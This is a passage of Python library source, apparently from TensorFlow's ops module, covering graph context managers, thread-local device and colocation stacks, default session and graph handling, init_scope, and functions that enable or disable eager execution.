raise TypeError("op_to_kernel_label_map must be a dictionary mapping "
"strings to strings")
try:
saved_labels[op_type] = self._op_to_kernel_label_map[op_type]
except KeyError:
pass
self._op_to_kernel_label_map[op_type] = label
try:
yield # The code within the context runs here.
finally:
# Remove the labels set for this context, and restore any saved labels.
for op_type, label in op_to_kernel_label_map.items():
try:
self._op_to_kernel_label_map[op_type] = saved_labels[op_type]
except KeyError:
del self._op_to_kernel_label_map[op_type]
# pylint: enable=g-doc-return-or-yield
# pylint: disable=g-doc-return-or-yield
@tf_contextlib.contextmanager
def gradient_override_map(self, op_type_map):
"""EXPERIMENTAL: A context manager for overriding gradient functions.
This context manager can be used to override the gradient function
that will be used for ops within the scope of the context.
For example:
```python
@tf.RegisterGradient("CustomSquare")
def _custom_square_grad(op, grad):
# ...
with tf.Graph().as_default() as g:
c = tf.constant(5.0)
s_1 = tf.square(c) # Uses the default gradient for tf.square.
with g.gradient_override_map({"Square": "CustomSquare"}):
s_2 = tf.square(s_2) # Uses _custom_square_grad to compute the
# gradient of s_2.
```
Args:
op_type_map: A dictionary mapping op type strings to alternative op type
strings.
Returns:
A context manager that sets the alternative op type to be used for one
or more ops created in that context.
Raises:
TypeError: If `op_type_map` is not a dictionary mapping strings to
strings.
"""
if not isinstance(op_type_map, dict):
raise TypeError("op_type_map must be a dictionary mapping "
"strings to strings")
# The saved_mappings dictionary stores any currently-set mappings that
# will be overridden by this context manager.
saved_mappings = {}
# Install the given label
for op_type, mapped_op_type in op_type_map.items():
if not (isinstance(op_type, six.string_types) and
isinstance(mapped_op_type, six.string_types)):
raise TypeError("op_type_map must be a dictionary mapping "
"strings to strings")
try:
saved_mappings[op_type] = self._gradient_override_map[op_type]
except KeyError:
pass
self._gradient_override_map[op_type] = mapped_op_type
try:
yield # The code within the context runs here.
finally:
# Remove the labels set for this context, and restore any saved labels.
for op_type, mapped_op_type in op_type_map.items():
try:
self._gradient_override_map[op_type] = saved_mappings[op_type]
except KeyError:
del self._gradient_override_map[op_type]
# pylint: enable=g-doc-return-or-yield
def prevent_feeding(self, tensor):
"""Marks the given `tensor` as unfeedable in this graph."""
self._unfeedable_tensors.add(tensor)
def is_feedable(self, tensor):
"""Returns `True` if and only if `tensor` is feedable."""
return tensor not in self._unfeedable_tensors
def prevent_fetching(self, op):
"""Marks the given `op` as unfetchable in this graph."""
self._unfetchable_ops.add(op)
def is_fetchable(self, tensor_or_op):
"""Returns `True` if and only if `tensor_or_op` is fetchable."""
if isinstance(tensor_or_op, Tensor):
return tensor_or_op.op not in self._unfetchable_ops
else:
return tensor_or_op not in self._unfetchable_ops
def switch_to_thread_local(self):
"""Make device, colocation and dependencies stacks thread-local.
Device, colocation and dependencies stacks are not thread-local be default.
If multiple threads access them, then the state is shared. This means that
one thread may affect the behavior of another thread.
After this method is called, the stacks become thread-local. If multiple
threads access them, then the state is not shared. Each thread uses its own
value; a thread doesn't affect other threads by mutating such a stack.
The initial value for every thread's stack is set to the current value
of the stack when `switch_to_thread_local()` was first called.
"""
if not self._stack_state_is_thread_local:
self._stack_state_is_thread_local = True
@property
def _device_function_stack(self):
if self._stack_state_is_thread_local:
# This may be called from a thread where device_function_stack doesn't yet
# exist.
# pylint: disable=protected-access
if not hasattr(self._thread_local, "_device_function_stack"):
stack_copy_for_this_thread = self._graph_device_function_stack.copy()
self._thread_local._device_function_stack = stack_copy_for_this_thread
return self._thread_local._device_function_stack
# pylint: enable=protected-access
else:
return self._graph_device_function_stack
@property
def _device_functions_outer_to_inner(self):
user_device_specs = self._device_function_stack.peek_objs()
device_functions = [spec.function for spec in user_device_specs]
device_functions_outer_to_inner = list(reversed(device_functions))
return device_functions_outer_to_inner
def _snapshot_device_function_stack_metadata(self):
"""Return device function stack as a list of TraceableObjects.
Returns:
[traceable_stack.TraceableObject, ...] where each TraceableObject's .obj
member is a displayable name for the user's argument to Graph.device, and
the filename and lineno members point to the code location where
Graph.device was called directly or indirectly by the user.
"""
snapshot = []
for obj in self._device_function_stack.peek_traceable_objs():
obj_copy = obj.copy_metadata()
obj_copy.obj = obj.obj.display_name
snapshot.append(obj_copy)
return snapshot
@_device_function_stack.setter
def _device_function_stack(self, device_function_stack):
if self._stack_state_is_thread_local:
# pylint: disable=protected-access
self._thread_local._device_function_stack = device_function_stack
# pylint: enable=protected-access
else:
self._graph_device_function_stack = device_function_stack
@property
def _colocation_stack(self):
"""Return thread-local copy of colocation stack."""
if self._stack_state_is_thread_local:
# This may be called from a thread where colocation_stack doesn't yet
# exist.
# pylint: disable=protected-access
if not hasattr(self._thread_local, "_colocation_stack"):
stack_copy_for_this_thread = self._graph_colocation_stack.copy()
self._thread_local._colocation_stack = stack_copy_for_this_thread
return self._thread_local._colocation_stack
# pylint: enable=protected-access
else:
return self._graph_colocation_stack
def _snapshot_colocation_stack_metadata(self):
"""Return colocation stack metadata as a dictionary."""
return {
traceable_obj.obj.name: traceable_obj.copy_metadata()
for traceable_obj in self._colocation_stack.peek_traceable_objs()
}
@_colocation_stack.setter
def _colocation_stack(self, colocation_stack):
if self._stack_state_is_thread_local:
# pylint: disable=protected-access
self._thread_local._colocation_stack = colocation_stack
# pylint: enable=protected-access
else:
self._graph_colocation_stack = colocation_stack
@property
def _control_dependencies_stack(self):
if self._stack_state_is_thread_local:
# This may be called from a thread where control_dependencies_stack
# doesn't yet exist.
if not hasattr(self._thread_local, "_control_dependencies_stack"):
self._thread_local._control_dependencies_stack = (
self._graph_control_dependencies_stack[:])
return self._thread_local._control_dependencies_stack
else:
return self._graph_control_dependencies_stack
@_control_dependencies_stack.setter
def _control_dependencies_stack(self, control_dependencies):
if self._stack_state_is_thread_local:
self._thread_local._control_dependencies_stack = control_dependencies
else:
self._graph_control_dependencies_stack = control_dependencies
@property
def _distribution_strategy_stack(self):
"""A stack to maintain distribution strategy context for each thread."""
if not hasattr(self._thread_local, "_distribution_strategy_stack"):
self._thread_local._distribution_strategy_stack = [] # pylint: disable=protected-access
return self._thread_local._distribution_strategy_stack # pylint: disable=protected-access
@_distribution_strategy_stack.setter
def _distribution_strategy_stack(self, _distribution_strategy_stack):
self._thread_local._distribution_strategy_stack = ( # pylint: disable=protected-access
_distribution_strategy_stack)
@property
def _global_distribute_strategy_scope(self):
"""For implementing `tf.distribute.set_strategy()`."""
if not hasattr(self._thread_local, "distribute_strategy_scope"):
self._thread_local.distribute_strategy_scope = None
return self._thread_local.distribute_strategy_scope
@_global_distribute_strategy_scope.setter
def _global_distribute_strategy_scope(self, distribute_strategy_scope):
self._thread_local.distribute_strategy_scope = (distribute_strategy_scope)
@property
def _auto_cast_variable_read_dtype(self):
"""The dtype that instances of `AutoCastVariable` will be casted to.
This is None if `AutoCastVariables` should not be casted.
See `AutoCastVariable` for more information.
Returns:
The dtype that instances of `AutoCastVariable` will be casted to.
"""
if not hasattr(self._thread_local, "_auto_cast_variable_read_dtype"):
self._thread_local._auto_cast_variable_read_dtype = None # pylint: disable=protected-access
return self._thread_local._auto_cast_variable_read_dtype # pylint: disable=protected-access
@_auto_cast_variable_read_dtype.setter
def _auto_cast_variable_read_dtype(self, dtype):
if dtype:
dtype = dtypes.as_dtype(dtype)
self._thread_local._auto_cast_variable_read_dtype = dtype # pylint: disable=protected-access
@tf_contextlib.contextmanager
def _enable_auto_casting_variables(self, dtype):
"""Context manager to automatically cast AutoCastVariables.
If an AutoCastVariable `var` is used under this context manager, it will be
casted to `dtype` before being used.
See `AutoCastVariable` for more information.
Args:
dtype: The dtype that AutoCastVariables should be casted to.
Yields:
Nothing.
"""
prev_read_dtype = self._auto_cast_variable_read_dtype
try:
self._auto_cast_variable_read_dtype = dtype
yield
finally:
self._auto_cast_variable_read_dtype = prev_read_dtype
def _mutation_lock(self):
"""Returns a lock to guard code that creates & mutates ops.
See the comment for self._group_lock for more info.
"""
return self._group_lock.group(_MUTATION_LOCK_GROUP)
def _session_run_lock(self):
"""Returns a lock to guard code for Session.run.
See the comment for self._group_lock for more info.
"""
return self._group_lock.group(_SESSION_RUN_LOCK_GROUP)
# TODO(agarwal): currently device directives in an outer eager scope will not
# apply to inner graph mode code. Fix that.
@tf_export(v1=["device"])
def device(device_name_or_function):
"""Wrapper for `Graph.device()` using the default graph.
See `tf.Graph.device` for more details.
Args:
device_name_or_function: The device name or function to use in the context.
Returns:
A context manager that specifies the default device to use for newly
created ops.
Raises:
RuntimeError: If eager execution is enabled and a function is passed in.
"""
if context.executing_eagerly():
if callable(device_name_or_function):
raise RuntimeError(
"tf.device does not support functions when eager execution "
"is enabled.")
return context.device(device_name_or_function)
elif executing_eagerly_outside_functions():
@tf_contextlib.contextmanager
def combined(device_name_or_function):
with get_default_graph().device(device_name_or_function):
if not callable(device_name_or_function):
with context.device(device_name_or_function):
yield
else:
yield
return combined(device_name_or_function)
else:
return get_default_graph().device(device_name_or_function)
@tf_export("device", v1=[])
def device_v2(device_name):
"""Specifies the device for ops created/executed in this context.
`device_name` can be fully specified, as in "/job:worker/task:1/device:cpu:0",
or partially specified, containing only a subset of the "/"-separated
fields. Any fields which are specified override device annotations from outer
scopes. For example:
```python
with tf.device('/job:foo'):
# ops created here have devices with /job:foo
with tf.device('/job:bar/task:0/device:gpu:2'):
# ops created here have the fully specified device above
with tf.device('/device:gpu:1'):
# ops created here have the device '/job:foo/device:gpu:1'
```
Args:
device_name: The device name to use in the context.
Returns:
A context manager that specifies the default device to use for newly
created ops.
Raises:
RuntimeError: If a function is passed in.
"""
if callable(device_name):
raise RuntimeError("tf.device does not support functions.")
return device(device_name)
@tf_export(v1=["container"])
def container(container_name):
"""Wrapper for `Graph.container()` using the default graph.
Args:
container_name: The container string to use in the context.
Returns:
A context manager that specifies the default container to use for newly
created stateful ops.
"""
return get_default_graph().container(container_name)
def _colocate_with_for_gradient(op, gradient_uid, ignore_existing=False):
if context.executing_eagerly():
if op is not None:
if not hasattr(op, "device"):
op = internal_convert_to_tensor_or_indexed_slices(op)
return device(op.device)
else:
return NullContextmanager()
else:
default_graph = get_default_graph()
if isinstance(op, EagerTensor):
if default_graph.building_function:
return default_graph.device(op.device)
else:
raise ValueError("Encountered an Eager-defined Tensor during graph "
"construction, but a function was not being built.")
return default_graph._colocate_with_for_gradient(
op, gradient_uid=gradient_uid, ignore_existing=ignore_existing)
# Internal interface to colocate_with. colocate_with has been deprecated from
# public API. There are still a few internal uses of colocate_with. Add internal
# only API for those uses to avoid deprecation warning.
def colocate_with(op, ignore_existing=False):
return _colocate_with_for_gradient(op, None, ignore_existing=ignore_existing)
@deprecation.deprecated(
date=None, instructions="Colocations handled automatically by placer.")
@tf_export(v1=["colocate_with"])
def _colocate_with(op, ignore_existing=False):
return colocate_with(op, ignore_existing)
@tf_export("control_dependencies")
def control_dependencies(control_inputs):
"""Wrapper for `Graph.control_dependencies()` using the default graph.
See `tf.Graph.control_dependencies`
for more details.
When eager execution is enabled, any callable object in the `control_inputs`
list will be called.
Args:
control_inputs: A list of `Operation` or `Tensor` objects which must be
executed or computed before running the operations defined in the context.
Can also be `None` to clear the control dependencies. If eager execution
is enabled, any callable object in the `control_inputs` list will be
called.
Returns:
A context manager that specifies control dependencies for all
operations constructed within the context.
"""
if context.executing_eagerly():
if control_inputs:
# Excute any pending callables.
for control in control_inputs:
if callable(control):
control()
return NullContextmanager()
else:
return get_default_graph().control_dependencies(control_inputs)
class _DefaultStack(threading.local):
"""A thread-local stack of objects for providing implicit defaults."""
def __init__(self):
super(_DefaultStack, self).__init__()
self._enforce_nesting = True
self.stack = []
def get_default(self):
return self.stack[-1] if len(self.stack) >= 1 else None
def reset(self):
self.stack = []
def is_cleared(self):
return not self.stack
@property
def enforce_nesting(self):
return self._enforce_nesting
@enforce_nesting.setter
def enforce_nesting(self, value):
self._enforce_nesting = value
@tf_contextlib.contextmanager
def get_controller(self, default):
"""A context manager for manipulating a default stack."""
self.stack.append(default)
try:
yield default
finally:
# stack may be empty if reset() was called
if self.stack:
if self._enforce_nesting:
if self.stack[-1] is not default:
raise AssertionError(
"Nesting violated for default stack of %s objects" %
type(default))
self.stack.pop()
else:
self.stack.remove(default)
_default_session_stack = _DefaultStack() # pylint: disable=protected-access
def default_session(session):
"""Python "with" handler for defining a default session.
This function provides a means of registering a session for handling
Tensor.eval() and Operation.run() calls. It is primarily intended for use
by session.Session, but can be used with any object that implements
the Session.run() interface.
Use with the "with" keyword to specify that Tensor.eval() and Operation.run()
invocations within the scope of a block should be executed by a particular
session.
The default session applies to the current thread only, so it is always
possible to inspect the call stack and determine the scope of a default
session. If you create a new thread, and wish to use the default session
in that thread, you must explicitly add a "with ops.default_session(sess):"
block in that thread's function.
Example:
The following code examples are equivalent:
# 1. Using the Session object directly:
sess = ...
c = tf.constant(5.0)
sess.run(c)
# 2. Using default_session():
sess = ...
with ops.default_session(sess):
c = tf.constant(5.0)
result = c.eval()
# 3. Overriding default_session():
sess = ...
with ops.default_session(sess):
c = tf.constant(5.0)
with ops.default_session(...):
c.eval(session=sess)
Args:
session: The session to be installed as the default session.
Returns:
A context manager for the default session.
"""
return _default_session_stack.get_controller(session)
@tf_export(v1=["get_default_session"])
def get_default_session():
"""Returns the default session for the current thread.
The returned `Session` will be the innermost session on which a
`Session` or `Session.as_default()` context has been entered.
NOTE: The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
Returns:
The default `Session` being used in the current thread.
"""
return _default_session_stack.get_default()
def _eval_using_default_session(tensors, feed_dict, graph, session=None):
"""Uses the default session to evaluate one or more tensors.
Args:
tensors: A single Tensor, or a list of Tensor objects.
feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists,
numpy ndarrays, TensorProtos, or strings.
graph: The graph in which the tensors are defined.
session: (Optional) A different session to use to evaluate "tensors".
Returns:
Either a single numpy ndarray if "tensors" is a single tensor; or a list
of numpy ndarrays that each correspond to the respective element in
"tensors".
Raises:
ValueError: If no default session is available; the default session
does not have "graph" as its graph; or if "session" is specified,
and it does not have "graph" as its graph.
"""
if session is None:
session = get_default_session()
if session is None:
raise ValueError("Cannot evaluate tensor using `eval()`: No default "
"session is registered. Use `with "
"sess.as_default()` or pass an explicit session to "
"`eval(session=sess)`")
if session.graph is not graph:
raise ValueError("Cannot use the default session to evaluate tensor: "
"the tensor's graph is different from the session's "
"graph. Pass an explicit session to "
"`eval(session=sess)`.")
else:
if session.graph is not graph:
raise ValueError("Cannot use the given session to evaluate tensor: "
"the tensor's graph is different from the session's "
"graph.")
return session.run(tensors, feed_dict)
def _run_using_default_session(operation, feed_dict, graph, session=None):
"""Uses the default session to run "operation".
Args:
operation: The Operation to be run.
feed_dict: A dictionary that maps Tensor objects (or tensor names) to lists,
numpy ndarrays, TensorProtos, or strings.
graph: The graph in which "operation" is defined.
session: (Optional) A different session to use to run "operation".
Raises:
ValueError: If no default session is available; the default session
does not have "graph" as its graph; or if "session" is specified,
and it does not have "graph" as its graph.
"""
if session is None:
session = get_default_session()
if session is None:
raise ValueError("Cannot execute operation using `run()`: No default "
"session is registered. Use `with "
"sess.as_default():` or pass an explicit session to "
"`run(session=sess)`")
if session.graph is not graph:
raise ValueError("Cannot use the default session to execute operation: "
"the operation's graph is different from the "
"session's graph. Pass an explicit session to "
"run(session=sess).")
else:
if session.graph is not graph:
raise ValueError("Cannot use the given session to execute operation: "
"the operation's graph is different from the session's "
"graph.")
session.run(operation, feed_dict)
class _DefaultGraphStack(_DefaultStack): # pylint: disable=protected-access
"""A thread-local stack of objects for providing an implicit default graph."""
def __init__(self):
super(_DefaultGraphStack, self).__init__()
self._global_default_graph = None
def get_default(self):
"""Override that returns a global default if the stack is empty."""
ret = super(_DefaultGraphStack, self).get_default()
if ret is None:
ret = self._GetGlobalDefaultGraph()
return ret
def _GetGlobalDefaultGraph(self):
if self._global_default_graph is None:
# TODO(mrry): Perhaps log that the default graph is being used, or set
# provide some other feedback to prevent confusion when a mixture of
# the global default graph and an explicit graph are combined in the
# same process.
self._global_default_graph = Graph()
return self._global_default_graph
def reset(self):
super(_DefaultGraphStack, self).reset()
self._global_default_graph = None
@tf_contextlib.contextmanager
def get_controller(self, default):
context.context().context_switches.push(default.building_function,
default.as_default,
default._device_function_stack)
try:
with super(_DefaultGraphStack,
self).get_controller(default) as g, context.graph_mode():
yield g
finally:
# If an exception is raised here it may be hiding a related exception in
# the try-block (just above).
context.context().context_switches.pop()
_default_graph_stack = _DefaultGraphStack()
# Shared helper used in init_scope and executing_eagerly_outside_functions
# to obtain the outermost context that is not building a function, and the
# innermost non empty device stack.
def _get_outer_context_and_inner_device_stack():
"""Get the outermost context not building a function."""
default_graph = get_default_graph()
outer_context = None
innermost_nonempty_device_stack = default_graph._device_function_stack # pylint: disable=protected-access
if not _default_graph_stack.stack:
# If the default graph stack is empty, then we cannot be building a
# function. Install the global graph (which, in this case, is also the
# default graph) as the outer context.
if default_graph.building_function:
raise RuntimeError("The global graph is building a function.")
outer_context = default_graph.as_default
else:
# Find a context that is not building a function.
for stack_entry in reversed(context.context().context_switches.stack):
if not innermost_nonempty_device_stack:
innermost_nonempty_device_stack = stack_entry.device_stack
if not stack_entry.is_building_function:
outer_context = stack_entry.enter_context_fn
break
if outer_context is None:
# As a last resort, obtain the global default graph; this graph doesn't
# necessarily live on the graph stack (and hence it doesn't necessarily
# live on the context stack), but it is stored in the graph stack's
# encapsulating object.
outer_context = _default_graph_stack._GetGlobalDefaultGraph().as_default # pylint: disable=protected-access
if outer_context is None:
# Sanity check; this shouldn't be triggered.
raise RuntimeError("All graphs are building functions, and no "
"eager context was previously active.")
return outer_context, innermost_nonempty_device_stack
# pylint: disable=g-doc-return-or-yield,line-too-long
@tf_export("init_scope")
@tf_contextlib.contextmanager
def init_scope():
"""A context manager that lifts ops out of control-flow scopes and function-building graphs.
There is often a need to lift variable initialization ops out of control-flow
scopes, function-building graphs, and gradient tapes. Entering an
`init_scope` is a mechanism for satisfying these desiderata. In particular,
entering an `init_scope` has three effects:
(1) All control dependencies are cleared the moment the scope is entered;
this is equivalent to entering the context manager returned from
`control_dependencies(None)`, which has the side-effect of exiting
control-flow scopes like `tf.cond` and `tf.while_loop`.
(2) All operations that are created while the scope is active are lifted
into the lowest context on the `context_stack` that is not building a
graph function. Here, a context is defined as either a graph or an eager
context. Every context switch, i.e., every installation of a graph as
the default graph and every switch into eager mode, is logged in a
thread-local stack called `context_switches`; the log entry for a
context switch is popped from the stack when the context is exited.
Entering an `init_scope` is equivalent to crawling up
`context_switches`, finding the first context that is not building a
graph function, and entering it. A caveat is that if graph mode is
enabled but the default graph stack is empty, then entering an
`init_scope` will simply install a fresh graph as the default one.
(3) The gradient tape is paused while the scope is active.
When eager execution is enabled, code inside an init_scope block runs with
eager execution enabled even when defining graph functions via
tf.contrib.eager.defun. For example:
```python
tf.compat.v1.enable_eager_execution()
@tf.contrib.eager.defun
def func():
# A defun-decorated function constructs TensorFlow graphs,
# it does not execute eagerly.
assert not tf.executing_eagerly()
with tf.init_scope():
# Initialization runs with eager execution enabled
assert tf.executing_eagerly()
```
Raises:
RuntimeError: if graph state is incompatible with this initialization.
"""
# pylint: enable=g-doc-return-or-yield,line-too-long
if context.executing_eagerly():
# Fastpath.
with tape.stop_recording():
yield
else:
# Retrieve the active name scope: entering an `init_scope` preserves
# the name scope of the current context.
scope = get_default_graph().get_name_scope()
if scope and scope[-1] != "/":
# Names that end with trailing slashes are treated by `name_scope` as
# absolute.
scope = scope + "/"
outer_context, innermost_nonempty_device_stack = (
_get_outer_context_and_inner_device_stack())
outer_graph = None
outer_device_stack = None
try:
with outer_context(), name_scope(scope), control_dependencies(
None), tape.stop_recording():
context_manager = NullContextmanager
context_manager_input = None
if not context.executing_eagerly():
# The device stack is preserved when lifting into a graph. Eager
# execution doesn't implement device stacks and in particular it
# doesn't support device functions, so in general it's not possible
# to do the same when lifting into the eager context.
outer_graph = get_default_graph()
outer_device_stack = outer_graph._device_function_stack # pylint: disable=protected-access
outer_graph._device_function_stack = innermost_nonempty_device_stack # pylint: disable=protected-access
elif innermost_nonempty_device_stack is not None:
for device_spec in innermost_nonempty_device_stack.peek_objs():
if device_spec.function is None:
break
if device_spec.raw_string:
context_manager = context.device
context_manager_input = device_spec.raw_string
break
# It is currently not possible to have a device function in V2,
# but in V1 we are unable to apply device functions in eager mode.
# This means that we will silently skip some of the entries on the
# device stack in V1 + eager mode.
with context_manager(context_manager_input):
yield
finally:
# If an exception is raised here it may be hiding a related exception in
# try-block (just above).
if outer_graph is not None:
outer_graph._device_function_stack = outer_device_stack # pylint: disable=protected-access
def executing_eagerly_outside_functions():
"""Returns True if executing eagerly, even if inside a graph function."""
if context.executing_eagerly():
return True
else:
outer_context, _ = _get_outer_context_and_inner_device_stack()
with outer_context():
return context.executing_eagerly()
def inside_function():
return get_default_graph().building_function
@tf_export(v1=["enable_eager_execution"])
def enable_eager_execution(config=None, device_policy=None,
execution_mode=None):
"""Enables eager execution for the lifetime of this program.
Eager execution provides an imperative interface to TensorFlow. With eager
execution enabled, TensorFlow functions execute operations immediately (as
opposed to adding to a graph to be executed later in a `tf.compat.v1.Session`)
and
return concrete values (as opposed to symbolic references to a node in a
computational graph).
For example:
```python
tf.compat.v1.enable_eager_execution()
# After eager execution is enabled, operations are executed as they are
# defined and Tensor objects hold concrete values, which can be accessed as
# numpy.ndarray`s through the numpy() method.
assert tf.multiply(6, 7).numpy() == 42
```
Eager execution cannot be enabled after TensorFlow APIs have been used to
create or execute graphs. It is typically recommended to invoke this function
at program startup and not in a library (as most libraries should be usable
both with and without eager execution).
Args:
config: (Optional.) A `tf.compat.v1.ConfigProto` to use to configure the
environment in which operations are executed. Note that
`tf.compat.v1.ConfigProto` is also used to configure graph execution (via
`tf.compat.v1.Session`) and many options within `tf.compat.v1.ConfigProto`
are not implemented (or are irrelevant) when eager execution is enabled.
device_policy: (Optional.) Policy controlling how operations requiring
inputs on a specific device (e.g., a GPU 0) handle inputs on a different
device (e.g. GPU 1 or CPU). When set to None, an appropriate value will
be picked automatically. The value picked may change between TensorFlow
releases.
Valid values:
- tf.contrib.eager.DEVICE_PLACEMENT_EXPLICIT: raises an error if the
placement is not correct.
- tf.contrib.eager.DEVICE_PLACEMENT_WARN: copies the tensors which are not
on the right device but logs a warning.
- tf.contrib.eager.DEVICE_PLACEMENT_SILENT: silently copies the tensors.
Note that this may hide performance problems as there is no notification
provided when operations are blocked on the tensor being copied between
devices.
- tf.contrib.eager.DEVICE_PLACEMENT_SILENT_FOR_INT32: silently copies
int32 tensors, raising errors on the other ones.
execution_mode: (Optional.) Policy controlling how operations dispatched are
actually executed. When set to None, an appropriate value will be picked
automatically. The value picked may change between TensorFlow releases.
Valid values:
- tf.contrib.eager.SYNC: executes each operation synchronously.
- tf.contrib.eager.ASYNC: executes each operation asynchronously. These
operations may return "non-ready" handles.
Raises:
ValueError: If eager execution is enabled after creating/executing a
TensorFlow graph, or if options provided conflict with a previous call
to this function.
"""
_api_usage_gauge.get_cell().set(True)
if context.default_execution_mode != context.EAGER_MODE:
return enable_eager_execution_internal(
config=config,
device_policy=device_policy,
execution_mode=execution_mode,
server_def=None)
@tf_export(v1=["disable_eager_execution"])
def disable_eager_execution():
"""Disables eager execution.
This function can only be called before any Graphs, Ops, or Tensors have been
created. It can be used at the beginning of the program for complex migration
projects from TensorFlow 1.x to 2.x.
"""
_api_usage_gauge.get_cell().set(False)
context.default_execution_mode = context.GRAPH_MODE
c = context.context_safe()
if c is not None:
c._thread_local_data.is_eager = False # pylint: disable=protected-access
def enable_eager_execution_internal(config=None,
device_policy=None,
execution_mode=None,
server_def=None):
"""Enables eager execution for the lifetime of this program.
Most of the doc string for enable_eager_execution is relevant here as well.
Args:
config: See enable_eager_execution doc string
device_policy: See enable_eager_execution doc string
execution_mode: See enable_eager_execution doc string
server_def: (Optional.) A tensorflow::ServerDef proto. Enables execution on
remote devices. GrpcServers need to be started by creating an identical
server_def to this, and setting the appropriate task_indexes, so that the
servers can communicate. It will then be possible to execute operations on
remote devices.
Raises:
ValueError
"""
if config is not None and not isinstance(config, config_pb2.ConfigProto):
raise TypeError("config must be a tf.ConfigProto, but got %s" %
type(config))
if device_policy not in (None, context.DEVICE_PLACEMENT_EXPLICIT,
context.DEVICE_PLACEMENT_WARN,
context.DEVICE_PLACEMENT_SILENT,
context.DEVICE_PLACEMENT_SILENT_FOR_INT32):
raise ValueError(
"device_policy must be one of None, tf.contrib.eager.DEVICE_PLACEMENT_*"
)
if execution_mode not in (None, context.SYNC, context.ASYNC):
raise ValueError(
"execution_mode must be one of None, tf.contrib.eager.SYNC, "
"tf.contrib.eager.ASYNC")
if context.default_execution_mode == context.GRAPH_MODE:
graph_mode_has_been_used = (
_default_graph_stack._global_default_graph is not None) # pylint: disable=protected-access
if graph_mode_has_been_used:
raise ValueError(
"tf.enable_eager_execution must be called at program startup.")
context.default_execution_mode = context.EAGER_MODE
# pylint: disable=protected-access
with context._context_lock:
if context._context is None:
context._set_context_locked(context.Context(
config=config,
device_policy=device_policy,
execution_mode=execution_mode,
server_def=server_def))
elif ((config is not None and config is not context._context._config) or
(device_policy is not None and
device_policy is not context._context._device_policy) or
(execution_mode is not None and
execution_mode is not context._context._execution_mode)):
raise ValueError(
"Trying to change the options of an active eager"
" execution. Context config: %s, specified config:"
" %s. Context device policy: %s, specified device"
" policy: %s. Context execution mode: %s, "
" specified execution mode %s." %
(context._context._config, config, context._context._device_policy,
device_policy, context._context._execution_mode, execution_mode))
else:
# We already created everything, so update the thread local data.
context._context._thread_local_data.is_eager = True
# Monkey patch to get rid of an unnecessary conditional since the context is
# now initialized.
context.context = context.context_safe
def eager_run(main=None, argv=None):
"""Runs the program with an optional main function and argv list.
The program will run with eager execution enabled.
Example:
```python
import tensorflow as tf
# Import subject to future changes:
from tensorflow.contrib.eager.python import tfe
def main(_):
u = tf.constant(6.0)
v = tf.constant(7.0)
print(u * v)
if __name__ == "__main__":
tfe.run()
```
Args:
main: the main function to run.
argv: the arguments to pass to it.
"""
enable_eager_execution()
app.run(main, argv)
@tf_export(v1=["reset_default_graph"])
def reset_default_graph():
"""Clears the default graph stack and resets the global default graph.
NOTE: The default graph is a property of the current thread. This
function applies only to the current thread. Calling this function while
a `tf.compat.v1.Session` or `tf.compat.v1.InteractiveSession` is active will
result in undefined
behavior. Using any previously created `tf.Operation` or `tf.Tensor` objects
after calling this function will result in undefined behavior.
Raises:
AssertionError: If this function is called within a nested graph.
"""
if not _default_graph_stack.is_cleared():
raise AssertionError("Do not use tf.reset_default_graph() to clear "
"nested graphs. If you need a cleared graph, "
"exit the nesting and create a new graph.")
_default_graph_stack.reset()
@tf_export(v1=["get_default_graph"])
def get_default_graph():
"""Returns the default graph for the current thread.
The returned graph will be the innermost graph on which a
`Graph.as_default()` context has been entered, or a global default
graph if none has been explicitly created.
NOTE: The default graph is a property of the current thread. If you
create a new thread, and wish to use the default graph in that
thread, you must explicitly add a `with g.as_default():` in that
thread's function.
Returns:
The default `Graph` being used in the current thread.
"""
return _default_graph_stack.get_default()
def has_default_graph():
"""Returns True if there is a default graph."""
return len(_default_graph_stack.stack) >= 1
def get_name_scope():
"""Returns the current name scope in the default_graph.
For example:
```python
with tf.name_scope('scope1'):
with tf.name_scope('scope2'):
print(tf.get_name_scope())
```
would print the string `scope1/scope2`.
Returns:
A string representing the current name scope.
"""
if context.executing_eagerly():
return context.context().scope_name.rstrip("/")
return get_default_graph().get_name_scope()
def _assert_same_graph(original_item, item):
"""Fail if the 2 items are from different graphs.
Args:
original_item: Original item to check against.
item: Item to check.
Raises:
ValueError: if graphs do not match.
"""
if original_item.graph is not item.graph:
raise ValueError("%s must be from the same graph as %s." %
(item, original_item))
def _get_graph_from_inputs(op_input_list, graph=None):
"""Returns the appropriate graph to use for the given inputs.
This library method provides a consistent algorithm for choosing the graph
in which an Operation should be constructed:
1. If the default graph is being used to construct a function, we
use the default graph.
2. If the "graph" is specified explicitly, we validate that all of the inputs
in "op_input_list" are compatible with that graph.
3. Otherwise, we attempt to select a graph from the first Operation-
or Tensor-valued input in "op_input_list", and validate that all other
such inputs are in the same graph.
4. If the graph was not specified and it could not be inferred from
"op_input_list", we attempt to use the default graph.
Args:
op_input_list: A list of inputs to an operation, which may include `Tensor`,
`Operation`, and other objects that may be converted to a graph element.
graph: (Optional) The explicit graph to use.
Raises:
TypeError: If op_input_list is not a list or tuple, or if graph is not a
Graph.
ValueError: If a graph is explicitly passed and not all inputs are from it,
or if the inputs are from multiple graphs, or we could not find a graph
and there was no default graph.
Returns:
The appropriate graph to use for the given inputs.
"""
current_default_graph = get_default_graph()
if current_default_graph.building_function:
return current_default_graph
op_input_list = tuple(op_input_list) # Handle generators correctly
if graph and not isinstance(graph, Graph):
raise TypeError("Input graph needs to be a Graph: %s" % graph)
# 1. We validate that all of the inputs are from the same graph. This is
# either the supplied graph parameter, or the first one selected from one
# the graph-element-valued inputs. In the latter case, we hold onto
# that input in original_graph_element so we can provide a more
# informative error if a mismatch is found.
original_graph_element = None
for op_input in op_input_list:
# Determine if this is a valid graph_element.
# TODO(josh11b): Note that we exclude subclasses of Tensor. Need to clean this
# up.
graph_element = None
if (isinstance(op_input, (Operation, _TensorLike)) and
((not isinstance(op_input, Tensor)) or type(op_input) == Tensor)): # pylint: disable=unidiomatic-typecheck
graph_element = op_input
else:
graph_element = _as_graph_element(op_input)
if graph_element is not None:
if not graph:
original_graph_element = graph_element
graph = graph_element.graph
elif original_graph_element is not None:
_assert_same_graph(original_graph_element, graph_element)
elif graph_element.graph is not graph:
raise ValueError("%s is not from the passed-in graph." % graph_element)
# 2. If all else fails, we use the default graph, which is always there.
return graph or current_default_graph
@tf_export(v1=["GraphKeys"])
class GraphKeys(object):
